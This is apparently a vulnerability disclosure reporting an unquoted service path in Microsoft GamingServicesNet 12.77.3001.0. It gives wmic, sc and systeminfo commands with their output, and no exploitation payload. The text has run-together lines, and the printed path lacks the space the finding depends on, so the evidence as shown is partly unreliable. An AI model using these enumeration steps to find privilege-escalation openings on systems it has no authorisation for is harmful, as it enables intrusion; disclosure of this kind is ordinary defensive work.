Headline
Microsoft GamingServicesNet 12.77.3001.0 Unquoted Service Path
Microsoft GamingServicesNet version 12.77.3001.0 suffers from an unquoted service path vulnerability.
# Exploit Title: Microsoft GamingServicesNet 12.77.3001.0 -'GamingServicesNet' Unquoted Service Path# Exploit Author: tmrswrr# Exploit Date: 2023-05.17# Vendor : https://www.microsoft.com/store/productId/9MWPM2CQNLHN# Version : 12.77.3001.0# Tested on OS: Windows 10 Enterprise# Step to discover Unquoted Service Path:==============>> wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """Gaming Services GamingServicesNetC:\ProgramFiles\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe AutoC:\>sc qc GamingServicesNet[SC] QueryServiceConfig SUCCESSSERVICE_NAME: GamingServicesNet TYPE : 210 WIN32_PACKAGED_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\ProgramFiles\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Gaming Services DEPENDENCIES : staterepository SERVICE_START_NAME : NT AUTHORITY\LocalServiceC:\>systeminfoHost Name: DESKTOP-JAN8AJHOS Name: Microsoft Windows 10 Enterprise EvaluationOS Version: 10.0.19045 N/A Build 19045